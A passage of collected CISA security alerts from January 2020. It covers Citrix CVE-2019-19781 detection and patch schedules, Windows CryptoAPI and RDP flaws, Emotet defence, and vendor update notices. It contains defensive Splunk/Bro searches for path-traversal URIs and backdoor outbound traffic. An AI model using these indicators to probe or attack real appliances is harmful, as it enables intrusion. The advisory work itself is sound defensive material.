From a network perspective, this vulnerability will likely not be detectable, given that the traffic will likely be encrypted (SSL). Additionally, due to where they sit on networks, devices such as these are typically not covered in traditional network monitoring and ingress traffic to the device may not be part of a normal SPAN port configuration. In the event network monitoring is available and attackers are using HTTP versions of this exploit, CISA recommends looking for URIs containing /../ or /vpns/ to identify potentially malicious activity. It is also worth surveying the traffic for any requests to .xml files or perl (.pl) files as well, as this would not be consistent with normal Citrix web activity. As with the web logs, analysts would be looking for a successful POST request followed by a successful GET request with the aforementioned characteristics.

Given that a compromise occurred, activity to look for would be outbound traffic from the Citrix server, both to internal and external hosts. In theory, if an attacker placed a backdoor on the system, it should be connecting outbound to a command and control server. This traffic would most likely be anomalous (outbound TCP Port 80 or 443), given that one would only expect to see inbound TCP/443 traffic to the Citrix server as normal activity. If an attacker is leveraging a Citrix device as an entry point to an organization, anomalous internal traffic could potentially be visible in bro data such as scanning, file transfers, or lateral movement. An exception to internal traffic is that the Citrix ADC device is much more than just an SSL VPN device and is used for multiple types of load balancing. As a result, an ADC device may be communicating with internal systems legitimately (web servers, file servers, custom applications, etc.).

Inbound Exploitation Activity (Suspicious URIs)

index=bro dest=<CITRIX_IP_ADDR> sourcetype=bro_http uri=*/../* OR uri=*/vpn* OR uri=*.pl OR uri=*.xml

Outbound Traffic Search (Backdoor C2)

index=bro sourcetype=bro_conn src=<CITRIX_IP_ADDR> dest!=<INTERNAL_NET>

| stats count by src dest dest_port

| sort -count

The following resources provide additional detection measures.

  • Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781.[6] The tool aids customers with detecting potential IOCs based on known attacks and exploits.
  • The National Security Agency released a Cybersecurity Advisory on CVE-2020-19781 with additional detection measures.[7]
  • CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[8]

Impact

CVE-2019-19781 is an arbitrary code execution vulnerability that has been detected in exploits in the wild. An attacker can exploit this vulnerability to take control of an affected system.

The vulnerability affects the following appliances:

  • Citrix NetScaler ADC and NetScaler Gateway version 10.5 – all supported builds before 10.5.70.12
  • Citrix ADC and NetScaler Gateway version 11.1 – all supported builds before 11.1.63.15
  • Citrix ADC and NetScaler Gateway version 12.0 – all supported builds before 12.0.63.13
  • Citrix ADC and NetScaler Gateway version 12.1 – all supported builds before 12.1.55.18
  • Citrix ADC and Citrix Gateway version 13.0 – all supported builds before 13.0.47.24
  • Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO – all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).

Mitigations

The resources provided include steps for standalone, HA pairs, and clustered Citrix instances.

Consider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible gateway appliances to require user authentication for the VPN before being able to reach these appliances.

CISA's Tip Handling Destructive Malware provides additional information, including best practices and incident response strategies.

References

Revisions

  • January 31, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/31/2020 10:50 AM EST
Original release date: January 31, 2020

Adobe has released security updates to address vulnerabilities affecting Magento Commerce and Open Source editions. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Adobe Security Bulletin APSB20-02 and apply the necessary updates.

 

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/29/2020 11:01 AM EST
Original release date: January 29, 2020

Tax Identity Theft Awareness Week is February 3-7. The Federal Trade Commission (FTC) Tax Identity Theft Awareness Week webpage will provide webinars and other resources from FTC and its partners throughout the week to help educate the public on how to protect against identity theft this tax season.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages taxpayers, businesses, and tax professionals to review the FTC announcement and the following resources for more information:

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/30/2020 11:14 AM EST
Original release date: January 30, 2020

Cisco has released security updates to address vulnerabilities affecting Cisco Small Business Switches. A remote attacker could exploit one of these vulnerabilities to obtain sensitive information.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Cisco Security Advisories cisco-sa-smlbus-switch-dos-R6VquS2u and cisco-sa-20200129-smlbus-switch-disclos for more information.

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/28/2020 10:53 AM EST
Original release date: January 28, 2020

January 28 is Data Privacy Day, an annual effort to empower individuals and organizations to respect privacy, safeguard data, and enable trust. This year, the National Cyber Security Alliance (NCSA) is bringing together experts on U.S. and international privacy for A Vision for the Future, an in-depth discussion on new privacy laws and regulations. The NCSA Stay Safe Online website will live stream the January 28 event beginning at 1 p.m. ET. Presentation topics will include how to prepare for and implement recent legislation, such as the California Consumer Privacy Act and the European Union’s General Data Protection Regulation.
 
The Cybersecurity and Infrastructure Security Agency (CISA), encourages users and administrators to review NCSA’s tips on updating privacy settings and the following CISA Tips.

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/28/2020 04:09 PM EST
Original release date: January 28, 2020

Apple has released security updates to address vulnerabilities in multiple products. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Apple security pages for the following products and apply the necessary updates:

This product is provided subject to this Notification and this Privacy & Use policy.


Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/20/2020 09:54 AM EST
Original release date: January 20, 2020 | Last revised: January 24, 2020

Summary

Note: As of January 24, 2020, Citrix has released all expected updates in response to CVE-2019-19781.[1] 

On January 19, 2020, Citrix released firmware updates for Citrix Application Delivery Controller (ADC) and Citrix Gateway versions 11.1 and 12.0.
On January 22, 2020, Citrix released security updates for vulnerable SD-WAN WANOP appliances.
On January 23, 2020, Citrix released firmware updates for Citrix ADC and Gateway versions 12.1 and 13.0.
On January 24, 2020, Citrix released firmware updates for Citrix ADC and Gateway version 10.5.

A remote, unauthenticated attacker could exploit CVE-2019-19781 to perform arbitrary code execution.[2] This vulnerability has been detected in exploits in the wild.[3]

The Cybersecurity and Infrastructure Agency (CISA) strongly recommends that all users and administrators upgrade their vulnerable appliances as soon as possible.

Timeline of Specific Events

  • December 17, 2019 – Citrix released Security Bulletin CTX267027 with mitigations steps.
  • January 8, 2020 – The CERT Coordination Center (CERT/CC) released Vulnerability Note VU#619785: Citrix Application Delivery Controller and Citrix Gateway Web Server Vulnerability,[4] and CISA releases a Current Activity entry.[5]
  • January 10, 2020 – The National Security Agency (NSA) released a Cybersecurity Advisory on CVE-2019-19781.[6]
  • January 11, 2020 – Citrix released blog post on CVE-2019-19781 with timeline for fixes.[7]
  • January 13, 2020 – CISA released a Current Activity entry describing their utility that enables users and administrators to test whether their Citrix ADC and Citrix Gateway firmware is susceptible to the CVE-2019-19781 vulnerability.[8] 
  • January 16, 2020 – Citrix announced that Citrix SD-WAN WANOP appliance is also vulnerable to CVE-2019-19781.
  • January 19, 2020 – Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 and blog post on accelerated schedule for fixes.[9]
  • January 22, 2020 – Citrix released security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3.[10]
  • January 22, 2020 – Citrix and FireEye Mandiant released an indicator of compromise (IOC) scanning tool for CVE-2019-19781.[11]
  • January 23, 2020 – Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0.[12]
  • January 24, 2020 – Citrix released firmware updates for Citrix ADC and Citrix Gateway version 10.5.

Technical Details

Impact

On December 17, 2019, Citrix reported vulnerability CVE-2019-19781. A remote, unauthenticated attacker could exploit this vulnerability to perform arbitrary code execution. This vulnerability has been detected in exploits in the wild.

The vulnerability affects the following appliances:

  • Citrix NetScaler ADC and NetScaler Gateway version 10.5 – all supported builds
  • Citrix ADC and NetScaler Gateway version 11.1 – all supported builds before 11.1.63.15
  • Citrix ADC and NetScaler Gateway version 12.0 – all supported builds before 12.0.63.13
  • Citrix ADC and NetScaler Gateway version 12.1 – all supported builds before 12.1.55.18
  • Citrix ADC and Citrix Gateway version 13.0 – all supported builds before 13.0.47.24
  • Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO – all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).

Detection Measures

Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781 on January 22, 2020. The tool aids customers with detecting potential IOCs based on known attacks and exploits.[13]

See the National Security Agency’s Cybersecurity Advisory on CVE-2020-19781 for other detection measures.[14]

CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[15] CISA encourages administrators to visit CISA’s GitHub page to download and run the tool.

Mitigations

CISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP as soon as possible.

The fixed builds can be downloaded from Citrix Downloads pages for Citrix ADC, Citrix Gateway, and Citrix SD-WAN.

Until the appropriate update is implemented, users and administrators should apply Citrix’s interim mitigation steps for CVE-2019-19781.[16] Verify the successful application of the above mitigations by using the tool in CTX269180 – CVE-2019-19781 – Verification ToolTest. Note: these mitigation steps apply to Citrix ADC and SD-WAN WANOP deployments.[17]

Refer to table 1 for Citrix’s planned fix schedule.[18]

Table 1. Fix schedule for Citrix appliances vulnerable to CVE-2019-19781

Vulnerable Appliance Firmware Update Release Date
Citrix ADC and Citrix Gateway version 10.5 Refresh Build 10.5.70.12 January 24, 2020
Citrix ADC and Citrix Gateway version 11.1 Refresh Build 11.1.63.15 January 19, 2020
Citrix ADC and Citrix Gateway version 12.0 Refresh Build 12.0.63.13 January 19, 2020
Citrix ADC and Citrix Gateway version 12.1 Refresh Build      12.1.55.18 January 23, 2020
Citrix ADC and Citrix Gateway version 13.0 Refresh Build 13.0.47.24 January 23, 2020
Citrix SD-WAN WANOP Release 10.2.6 Build 10.2.6b January 22, 2020
Citrix SD-WAN WANOP Release 11.0.3 Build 11.0.3b January 22, 2020

 

Administrators should review NSA’s Citrix Advisory for other mitigations, such as applying the following defense-in-depth strategy:

“Consider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible Citrix ADC and Citrix Gateway appliances to require user authentication for the VPN before being able to reach these appliances. Use of a proprietary SSLVPN/TLSVPN is discouraged.”

References

Revisions

  • January 20, 2020: Initial Version
  • January 23, 2020: Updated with information about Citrix releasing fixes for SD-WAN WANOP appliances and an IOC scanning tool
  • January 24, 2020: Updated with information about Citrix releasing fixes for Citrix ADC and Gateway versions 10.5, 12.1, and 13.0

This product is provided subject to this Notification and this Privacy & Use policy.


Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/24/2020 09:47 AM EST
Original release date: January 24, 2020

The National Security Agency (NSA) has released an information sheet with guidance on mitigating cloud vulnerabilities. NSA identifies cloud security components and discusses threat actors, cloud vulnerabilities, and potential mitigation measures.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators and users to review NSA's guidance on Mitigating Cloud Vulnerabilities and CISA’s page on APTs Targeting IT Service Provider Customers and Analysis Report on Microsoft Office 365 and other Cloud Security Observations for information on implementing a defense-in-depth strategy to protect infrastructure assets.

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/23/2020 11:45 AM EST
Original release date: January 23, 2020

Cisco has released updates to address vulnerabilities affecting multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system. For updates addressing lower severity vulnerabilities, see the Cisco Security Advisories page.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Cisco advisories and apply the necessary updates:

 

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/23/2020 04:20 PM EST
Original release date: January 23, 2020

Citrix has released security updates to address the CVE-2019-19781 vulnerability in Citrix SD-WAN WANOP. An attacker could exploit this vulnerability to take control of an affected system. Citrix has also released an Indicators of Compromise Scanner that aims to identify evidence of successful exploitation of CVE-2019-19781.

The Cybersecurity and Infrastructure Security Agency (CISA) strongly recommends users and administrators review the Citrix Security Bulletin CTX267027 and apply the necessary updates. CISA also recommends users and administrators:

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/24/2020 12:21 PM EST
Original release date: January 24, 2020

Cisco has released security updates to address a vulnerability affecting Cisco Webex Meetings Suite and Cisco Webex Meetings Online. A remote attacker could exploit this vulnerability to obtain sensitive information.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Cisco Security Advisory cisco-sa-20200124-webex-unauthjoin for more information.

This product is provided subject to this Notification and this Privacy & Use policy.


Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/22/2020 10:57 AM EST
Original release date: January 22, 2020

The Internet Crime Complaint Center (IC3) has issued an alert warning consumers of fake jobs and hiring scams targeting applicants’ personally identifiable information (PII). Cyber criminals posing as legitimate employers spoof company websites and post fake job openings to lure victims. Cyber criminals will conduct fake interviews and even offer positions to victims before requesting PII such as Social Security numbers and bank account information.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the IC3 Alert and CISA’s Tips on Avoiding Social Engineering and Phishing Attacks and Website Security for more information. If you believe you are a victim of cybercrime, file a complaint with IC3 at www.ic3.gov.

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/22/2020 06:04 PM EST
Original release date: January 22, 2020

The Cybersecurity and Infrastructure Security Agency (CISA) is aware of a recent increase in targeted Emotet malware attacks. Emotet is a sophisticated Trojan that commonly functions as a downloader or dropper of other malware. Emotet primarily spreads via malicious email attachments and attempts to proliferate within a network by brute forcing user credentials and writing to shared drives. If successful, an attacker could use an Emotet infection to obtain sensitive information. Such an attack could result in proprietary information and financial loss as well as disruption to operations and harm to reputation.

CISA recommends users and administrator adhere to the following best practices to defend against Emotet. See CISA’s Alert on Emotet Malware for detailed guidance.

  • Block email attachments commonly associated with malware (e.g.,.dll and .exe).
  • Block email attachments that cannot be scanned by antivirus software (e.g., .zip files).
  • Implement Group Policy Object and firewall rules.
  • Implement an antivirus program and a formalized patch management process.
  • Implement filters at the email gateway, and block suspicious IP addresses at the firewall.
  • Adhere to the principal of least privilege.
  • Implement a Domain-Based Message Authentication, Reporting & Conformance (DMARC) validation system.
  • Segment and segregate networks and functions. 
  • Limit unnecessary lateral communications.

CISA encourages users and administrators to review the following resources for information about defending against Emotet and other malware.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/21/2020 11:11 AM EST
Original release date: January 21, 2020

The Samba Team has released security updates to address vulnerabilities in multiple versions of Samba. An attacker could exploit one of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Samba Security Announcements for CVE-2019-14902, CVE-2019-14907, and CVE-2019-19344 and apply the necessary updates and workarounds.

 

This product is provided subject to this Notification and this Privacy & Use policy.

CISA Logo

National Cyber Awareness System:

01/20/2020 1:15 PM EST
Original release date: January 20, 2020

Summary

On January 19, 2020, Citrix released firmware updates for Citrix Application Delivery Controller (ADC) and Citrix Gateway versions 11.1 and 12.0 to address CVE-2019-19781. Citrix expects to release updates for other vulnerable versions of Citrix ADC, Gateway, and SD-WAN WANOP appliances through January 24, 2020. (See Mitigations for update schedule).[1]

A remote, unauthenticated attacker could exploit CVE-2019-19781 to perform arbitrary code execution.[2] This vulnerability has been detected in exploits in the wild.[3]

The Cybersecurity and Infrastructure Agency (CISA) strongly recommends that all users and administrators upgrade their vulnerable appliances as soon as possible once the appropriate firmware update becomes available.

Timeline of Specific Events

  • December 17, 2019 – Citrix releases Security Bulletin CTX267027 with mitigations steps.
  • January 8, 2020 – The CERT Coordination Center (CERT/CC) releases Vulnerability Note VU#619785: Citrix Application Delivery Controller and Citrix Gateway Web Server Vulnerability, [4] and CISA releases a Current Activity entry.[5]
  • January 10, 2020 – The National Security Agency (NSA) releases a Cybersecurity Advisory on CVE-2019-19781.[6]
  • January 11, 2020 – Citrix releases blog post on CVE-2019-19781 with timeline for fixes.[7]
  • January 13, 2020 – CISA releases a Current Activity entry describing their utility that enables users and administrators to test whether their Citrix ADC and Citrix Gateway firmware is susceptible to the CVE-2019-19781 vulnerability.[8] 
  • January 16, 2020 – Citrix announces that Citrix SD-WAN WANOP appliance is also vulnerable to CVE-2019-19781.
  • January 19, 2020 – Citrix releases firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 and blog post on accelerated schedule for fixes.[9]
  • January 24, 2020 – Citrix expects to release firmware updates for Citrix ADC and Citrix Gateway versions 10.5, 12.1, and 13.0 and Citrix SD-WAN WANOP release 10.2.6 and 11.0.3.

Technical Details

Impact

On December 17, 2019, Citrix reported vulnerability CVE-2019-19781. A remote, unauthenticated attacker could exploit this vulnerability to perform arbitrary code execution. This vulnerability has been detected in exploits in the wild.

The vulnerability affects the following appliances:

  • Citrix NetScaler ADC and NetScaler Gateway version 10.5 – all supported builds
  • Citrix ADC and NetScaler Gateway version 11.1 – all supported builds before 11.1.63.15
  • Citrix ADC and NetScaler Gateway version 12.0 – all supported builds before 12.0.63.13
  • Citrix ADC and NetScaler Gateway version 12.1 – all supported builds
  • Citrix ADC and Citrix Gateway version 13.0 – all supported builds
  • Citrix SD-WAN WANOP firmware and appliance models 4000, 4100, 5000, and 5100 – all supported builds. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).

Detection Measures

CISA has released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[10] CISA encourages administrators to visit CISA’s GitHub page to download and run the tool.

See the National Security Agency’s Cybersecurity Advisory on CVE-2020-19781 for other detection measures.[11]

Mitigations

CISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP once the appropriate firmware updates become available.

The fixed builds can be downloaded from Citrix Downloads pages for Citrix ADC and Citrix Gateway.

Until the appropriate update is accessible, users and administrators should apply Citrix’s interim mitigation steps for CVE-2019-19781.[12] Verify the successful application of the above mitigations by using the tool in CTX269180 – CVE-2019-19781 – Verification ToolTest. Note: these mitigation steps apply to Citrix ADC and SD-WAN WANOP deployments.[13]

Refer to table 1 for Citrix’s planned fix schedule.[14]

Table 1. Fix schedule for Citrix appliances vulnerable to CVE-2019-19781

Vulnerable Appliance Firmware Update Release Date
Citrix ADC and Citrix Gateway version 10.5 Refresh Build 10.5.70.x January 24, 2020 (Expected)
Citrix ADC and Citrix Gateway version 11.1 Refresh Build 11.1.63.15 January 19, 2020
Citrix ADC and Citrix Gateway version 12.0 Refresh Build 12.0.63.13 January 19, 2020
Citrix ADC and Citrix Gateway version 12.1 Refresh Build 12.1.55.x January 24, 2020 (Expected)
Citrix ADC and Citrix Gateway version 13.0 Refresh Build 13.0.47.x January 24, 2020 (Expected)
Citrix SD-WAN WANOP Release 10.2.6 Citrix ADC Release 11.1.51.615 January 24, 2020 (Expected)
Citrix SD-WAN WANOP Release 11.0.3 Citrix ADC Release 11.1.51.615 January 24, 2020 (Expected)

 

Administrators should review NSA’s Citrix Advisory for other mitigations, such as applying the following defense-in-depth strategy:

“Consider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible Citrix ADC and Citrix Gateway appliances to require user authentication for the VPN before being able to reach these appliances. Use of a proprietary SSLVPN/TLSVPN is discouraged.”

References

Revisions

January 20, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/17/2020 10:52 AM EST
Original release date: January 17, 2020

Google has released Chrome version 79.0.3945.130 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Chrome Release and apply the necessary updates.

 

 

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/17/2020 08:55 PM EST
Original release date: January 17, 2020

Microsoft has released a security advisory to address a critical vulnerability in Internet Explorer. A remote attacker could exploit this vulnerability to take control of an affected system. According to the advisory, “Microsoft is aware of limited targeted attacks.”

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft’s Advisory ADV20001 and CERT/CC's Vulnerability Note VU#338824 for more information, implement workarounds, and apply updates when available. Consider using Microsoft Edge or an alternate browser until patches are made available.

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/17/2020 09:34 PM EST
Original release date: January 17, 2020

Citrix has released an article with updates on CVE-2019-19781, a vulnerability affecting Citrix Application Delivery Controller (ADC) and Citrix Gateway. This vulnerability also affects Citrix SD-WAN WANOP product versions 10.2.6 and version 11.0.3. The article includes updated mitigations for Citrix ADC and Citrix Gateway Release 12.1 build 50.28. An attacker could exploit CVE-2019-19781 to take control of an affected system. Citrix plans to begin releasing security updates for affected software starting January 20, 2020.

The Cybersecurity and Infrastructure Security Agency (CISA) recommends users and administrators:

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/14/2020 05:01 PM EST
Original release date: January 14, 2020

Oracle has released its Critical Patch Update for January 2020 containing 334 new security patches to address vulnerabilities across multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Oracle January 2020 Critical Patch Update and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/14/2020 04:57 PM EST
Original release date: January 14, 2020

Adobe has released security updates to address vulnerabilities in Illustrator CC and Experience Manager. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Adobe Security Bulletins APSB20-03 and APSB20-01 and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/14/2020 04:53 PM EST
Original release date: January 14, 2020

VMware has released a security update to address a vulnerability in VMware Tools. An attacker could exploit this vulnerability to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review VMware Security Advisory VMSA-2020-0002 and apply the necessary update.

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/14/2020 03:41 PM EST
Original release date: January 14, 2020

Intel has released security updates to address vulnerabilities in multiple products. An authenticated attacker with local access could exploit some of these vulnerabilities to gain escalation of privileges.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Intel advisories and apply the necessary updates:

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/14/2020 03:32 PM EST
Original release date: January 14, 2020

Microsoft has released updates to address multiple vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft’s January 2020 Security Update Summary and Deployment Information and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/14/2020 02:08 PM EST
Original release date: January 14, 2020

The Cybersecurity and Infrastructure Security Agency (CISA) has released an Emergency Directive and Activity Alert addressing critical vulnerabilities affecting Windows CryptoAPI and Windows Remote Desktop Protocol (RDP) server and client. A remote attacker could exploit these vulnerabilities to decrypt, modify, or inject data on user connections.

Although Emergency Directive 20-02 applies only to certain Executive Branch departments and agencies, CISA strongly recommends state and local governments, the private sector, and others also patch these critical vulnerabilities as soon as possible. Review the following resources for more information:

This product is provided subject to this Notification and this Privacy & Use policy.


Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/14/2020 12:46 PM EST
Original release date: January 14, 2020

Summary

New vulnerabilities are continually emerging, but the best defense against attackers exploiting patched vulnerabilities is simple: keep software up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.

On January 14, 2020, Microsoft released software fixes to address 49 vulnerabilities as part of their monthly Patch Tuesday announcement. Among the vulnerabilities patched were critical weaknesses in Windows CryptoAPI and Windows Remote Desktop Protocol (RDP) server and client. An attacker could remotely exploit these vulnerabilities to decrypt, modify, or inject data on user connections:

  • CryptoAPI spoofing vulnerability – CVE-2020-0601: This vulnerability affects all machines running 32- or 64-bit Windows 10 operating systems, including Windows Server versions 2016 and 2019. This vulnerability allows Elliptic Curve Cryptography (ECC) certificate validation to bypass the trust store, enabling unwanted or malicious software to masquerade as authentically signed by a trusted or trustworthy organization. This could deceive users or thwart malware detection methods such as antivirus. Additionally, a maliciously crafted certificate could be issued for a hostname that did not authorize it, and a browser that relies on Windows CryptoAPI would not issue a warning, allowing an attacker to decrypt, modify, or inject data on user connections without detection.
  • Multiple Windows RDP vulnerabilities – CVE-2020-0609, CVE-2020-0610, and CVE-2020-0611: These vulnerabilities affect Windows Server 2012 and newer. In addition, CVE-2020-0611 affects Windows 7 and newer. These vulnerabilities—in the Windows Remote Desktop client and RDP Gateway Server—allow for remote code execution, where arbitrary code could be run freely. The server vulnerabilities do not require authentication or user interaction and can be exploited by a specially crafted request. The client vulnerability can be exploited by convincing a user to connect to a malicious server.

The Cybersecurity and Infrastructure Security Agency (CISA) is unaware of active exploitation of these vulnerabilities. However, because patches have been publicly released, the underlying vulnerabilities can be reverse-engineered to create exploits that target unpatched systems.

CISA strongly recommends organizations install these critical patches as soon as possible—prioritize patching by starting with mission critical systems, internet-facing systems, and networked servers. Organizations should then prioritize patching other affected information technology/operational technology (IT/OT) assets.

Technical Details

CryptoAPI Spoofing Vulnerability – CVE-2020-0601

A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates ECC certificates.

According to Microsoft, “an attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider.” Additionally, “a successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.”[1]

A cyber attacker could exploit CVE-2020-0601 to obtain sensitive information, such as financial information, or run malware on a targeted system; for example:

  • A maliciously crafted certificate could appear to be issued for a hostname that did not authorize it, preventing a browser that relies on Windows CryptoAPI from validating its authenticity and issuing warnings. If the certificate impersonates a user’s bank website, their financial information could be exposed.
  • Signed malware can bypass protections (e.g., antivirus) that only run applications with valid signatures. Malicious files, emails, and executables can appear legitimate to unpatched users.

The Microsoft Security Advisory for CVE-2020-0601 addresses this vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates.

Detection Measures

The National Security Agency (NSA) provides detection measures for CVE-2020-0601 in their Cybersecurity Advisory: Patch Critical Cryptographic Vulnerability in Microsoft Windows Clients and Servers.[2]

Windows Remote Desktop Server Vulnerabilities – CVE-2020-0609/CVE-2020-0610

According to Microsoft, “A remote code execution vulnerability exists in in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction.”[3],[4]

CVE-2020-0609/CVE-2020-0610:

  • Affects all supported Windows Server versions (Server 2012 and newer; support for Server 2008 ends January 14, 2020);
  • Occurs pre-authentication; and
  • Requires no user interaction to perform.

The Microsoft Security Advisories for CVE-2020-0609 and CVE-2020-0610 address these vulnerabilities.

Windows Remote Desktop Client vulnerability – CVE-2020-0611

According to Microsoft, “A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client.”[5]

CVE-2020-0611 requires the user to connect to a malicious server via social engineering, DNS poisoning, a man-in the-middle attack, or by the attacker compromising a legitimate server.

The Microsoft Security Advisory for CVE-2020-0611 addresses this vulnerability.

Impact

A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts include:

  • Temporary or permanent loss of sensitive or proprietary information,
  • Disruption to regular operations,
  • Financial losses relating to restoring systems and files, and
  • Potential harm to an organization’s reputation.

Mitigations

CISA strongly recommends organizations read the Microsoft January 2020 Release Notes page for more information and apply critical patches as soon as possible—prioritize patching by starting with mission critical systems, internet-facing systems, and networked servers. Organizations should then prioritize patching other affected IT/OT assets.

General Guidance

  • Review Guide to Enterprise Patch Management Technologies, NIST Special Publication 800-40 Revision 3. Patch management is the process for identifying, acquiring, installing, and verifying patches for products and systems. This publication is designed to assist organizations in understanding the basics of enterprise patch management technologies. It explains the importance of patch management and examines the challenges inherent in performing patch management. It provides an overview of enterprise patch management technologies, and also briefly discusses metrics for measuring the technologies’ effectiveness.
  • Review CISA Insights publications. Informed by U.S. cyber intelligence and real-world events, each CISA Insight provides background information on particular cyber threats and the vulnerabilities they exploit, as well as a ready-made set of mitigation activities that non-federal partners can implement. Printable materials can be found by visiting: https://www.cisa.gov/publication/cisa-insights-publications.
